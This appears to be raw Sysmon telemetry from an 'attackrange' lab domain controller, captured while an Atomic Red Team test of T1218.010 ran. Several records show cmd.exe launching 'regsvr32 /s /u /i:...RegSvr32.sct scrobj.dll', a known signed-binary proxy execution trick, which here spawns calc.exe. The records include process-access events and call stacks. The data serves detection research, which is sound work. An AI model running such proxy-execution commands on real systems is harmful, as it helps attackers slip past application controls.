22:12:49.460{FF16AF91-36E1-6013-6E03-00000000A401}19841780C:\Windows\system32\regsvr32.exe{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\SHELL32.dll+8d42f|C:\Windows\System32\SHELL32.dll+8d2bc|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032760Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.463{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EA,IMPHASH=3843C3D4A5A7D1045ABE9A4BFCFAAB28{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\System32\regsvr32.exeC:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll 10341000x800000000000000032759Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.460{FF16AF91-26B5-6013-0B00-00000000A401}8603460C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032758Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.460{FF16AF91-26B5-6013-0B00-00000000A401}8603460C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032757Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.413{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032756Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.413{FF16AF91-26B7-6013-1400-00000000A401}13725188C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032755Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.397{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032754Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.397{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032753Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032752Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032751Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032750Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032749Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26BA-6013-2300-00000000A401}28124716C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032748Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-36E1-6013-6D03-00000000A401}66206528C:\Windows\system32\cmd.exe{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032747Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.391{FF16AF91-36E1-6013-6E03-00000000A401}1984C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{FF16AF91-36E1-6013-6D03-00000000A401}6620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll" 10341000x800000000000000032746Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36E1-6013-6D03-00000000A401}6620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032745Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-6D03-00000000A401}6620C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFE178CA5C3) 10341000x800000000000000032744Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032743Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032742Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032741Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032740Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26BA-6013-2300-00000000A401}28124716C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-6D03-00000000A401}6620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032739Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-6D03-00000000A401}6620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503746(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5035ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e585de6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4fc1a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5395(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e531474(wow64) 154100x800000000000000032738Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-36E1-6013-6D03-00000000A401}6620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000032737Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.382{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-err.txt2021-01-28 22:12:49.366 11241100x800000000000000032736Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.366{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\chocolatey\art-out.txt2021-01-28 22:12:49.366 10341000x800000000000000032735Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.241{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36E1-6013-6C03-00000000A401}6444C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032734Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.241{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W